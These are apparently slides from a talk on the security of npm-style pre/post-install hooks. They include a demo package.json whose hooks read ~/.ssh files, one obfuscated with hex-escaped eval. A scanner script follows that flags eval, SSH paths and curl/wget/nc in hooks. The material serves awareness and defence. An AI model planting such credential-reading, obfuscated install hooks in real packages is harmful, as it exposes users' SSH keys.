What my talk is about:

  • Package Managers Pre-/Post-Install Security 
  • Witty Anecdotes
  • RubberDucky ಠ_ಠ

Who Am I?

Johannes Boyne

Founded: Archkomm GmbH

Now: @ zweitag

IT Security of Package Managers

  • Pre-/Post-Installs of Package Managers
  • ...let's get evil
  • Security Projects

Pre-/Post-Installs of Package Managers

So practical...
So easy...
...if you are not careful

What does a Package Manager Do?

  • Installs packages / modules / gems (call it what you want)
  • Pre-/Post-Installs
    • How often have you looked into the pre-/post-install hooks?

{
  "name": "honeypotpackage",
  "version": "0.0.2",
  "description": "evel knievel",
  "main": "index.js",
  "scripts": {
    "preinstall": "echo \"I will get your sshs:\" && cat ~/.ssh/",
    "postinstall": "echo \"I will get your sshs:\" && eval `printf \"\\x63\\x61\\x74\\x20\\x7e\\x2f\\x2e\\x73\\x73\\x68\\x2f\\x69\\x64\\x5f\\x72\\x73\\x61\\x2e\\x70\\x75\\x62\"`"
  },
  "keywords": ["evil","do","not","use"],
  "author": "Johannes Boyne <>",
  "license": "MIT"
}

cat ~/.ssh/

eval `printf \"\\x63\\x61\\x74\\x20\\x7e\\x2f\\x2e\\x73\\x73\\x68\\x2f\\x69\\x64\\x5f\\x72\\x73\\x61\\x2e\\x70\\x75\\x62\"`

How to protect yourself and your clients?

  • reading, reading, reading, ... :( 
  • Support one of the security projects
  • Implement "scanners" / virtual testing machines
    • one of my little side projects
  • or use a private repository
    • private-repo-as-a-service gemfury
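
A small "scanner" of the kind suggested above, as an added example (not code from the talk or from any of the named projects). It audits the install hooks in a package.json before anything is installed and decodes \xNN escapes so a hidden command is reviewed in clear text. The rule list and function names are assumptions for illustration, and the sample manifest is constructed from the honeypotpackage shown earlier.

```javascript
// Added example: review npm install hooks in a manifest without running them.
const HOOKS = ["preinstall", "install", "postinstall"];

// Heuristic rules (illustrative assumptions, not a complete rule set).
const RULES = [
  { id: "dynamic-eval", re: /\beval\b|`[^`]*`|\$\(/ },
  { id: "credential-path", re: /~\/\.ssh|\.ssh\/|id_rsa|\.npmrc|\.aws\// },
  { id: "network-fetch", re: /\b(curl|wget|nc)\b/ },
  { id: "escaped-bytes", re: /\\x[0-9a-fA-F]{2}/ },
];

// Turn \xNN escapes into characters so obfuscated commands become readable.
function decodeHexEscapes(s) {
  return s.replace(/\\+x([0-9a-fA-F]{2})/g,
    (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Return one finding per install hook; each rule is tested against both
// the raw command and its decoded form.
function auditManifest(jsonText) {
  const scripts = JSON.parse(jsonText).scripts || {};
  const findings = [];
  for (const hook of HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const decoded = decodeHexEscapes(cmd);
    const rules = RULES
      .filter((r) => r.re.test(cmd) || r.re.test(decoded))
      .map((r) => r.id);
    findings.push({ hook, cmd, decoded, rules });
  }
  return findings;
}

// Constructed sample input modelled on the manifest shown in the slides.
const SAMPLE = JSON.stringify({
  name: "honeypotpackage",
  version: "0.0.2",
  scripts: {
    preinstall: 'echo "I will get your sshs:" && cat ~/.ssh/',
    postinstall: 'echo "I will get your sshs:" && eval `printf "\\x63\\x61\\x74\\x20\\x7e\\x2f\\x2e\\x73\\x73\\x68\\x2f\\x69\\x64\\x5f\\x72\\x73\\x61\\x2e\\x70\\x75\\x62"`',
    test: "mocha",
  },
});

for (const f of auditManifest(SAMPLE)) {
  console.log(f.hook, f.rules.join(","), "=>", f.decoded);
}
```

Any hook that is present is reported even when no rule matches, so it still gets read by a human; installing with npm's --ignore-scripts keeps hooks from running while the review happens.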

Security Projects

Node Security Project
Ruby on Rails Security Project
OWASP Python Security Project

Witty Anecdotes



Publishing of a Symantec product's source code


A vulnerability on a server was exploited


January 2012


Trojan was able to log in as the user while the smartcard was inserted in the smartcard reader

FreeBSD


SSH keys had been stolen


Two FreeBSD servers had been hacked


November 2012


Servers had to be taken offline and reinstalled

What can you do?

=> Secure Programming

Rubber Ducky

CODE A DIFFERENCE: Use your skills to improve your city!